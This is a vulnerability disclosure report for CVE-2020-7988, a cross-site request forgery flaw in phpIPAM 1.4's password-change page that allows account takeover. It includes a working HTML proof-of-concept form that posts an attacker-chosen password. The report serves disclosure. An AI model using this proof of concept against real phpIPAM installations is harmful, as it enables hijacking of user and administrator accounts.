Untitled


> [Suggested description]
> An issue was discovered in tools/pass-change/result.php in phpIPAM 1.4.
> CSRF can be used to change the password of any user/admin, to
> escalate privileges, and to gain access to more data and functionality. This issue exists
> due to the lack of a requirement to provide the old password, and the lack of security
> tokens.
>
> ------------------------------------------
>
> [Additional Information]
> I've sent to the vendor with the vulnerability details but haven't received any reply yet.
>
> CSRF POC:
>
> <html>
>   <body>
>   <script>history.pushState('', '', '/')</script>
>     <form action="http://hostname/app/tools/pass-change/result.php" method="POST">
>       <input type="hidden" name="ipampassword1" value="attackers_password" />
>       <input type="hidden" name="ipampassword2" value="attackers_password" />
>       <input type="submit" value="Submit request" />
>     </form>
>   </body>
> </html>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
>
> ------------------------------------------
>
> [Vendor of Product]
> phpIPAM
>
> ------------------------------------------
>
> [Affected Product Code Base]
> phpIPAM - 1.4
>
> ------------------------------------------
>
> [Affected Component]
> result.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [CVE Impact Other]
> Account Takeover
>
> ------------------------------------------
>
> [Attack Vectors]
> Crafting a post request in a button with the new password and luring the victim to click it.
>
> ------------------------------------------
>
> [Reference]
> https://phpipam.net/news/phpipam-v1-5-released/
>
> ------------------------------------------
>
> [Discoverer]
> Khalid Amin https://hackerone.com/khalidamin

CVE-2020-7988.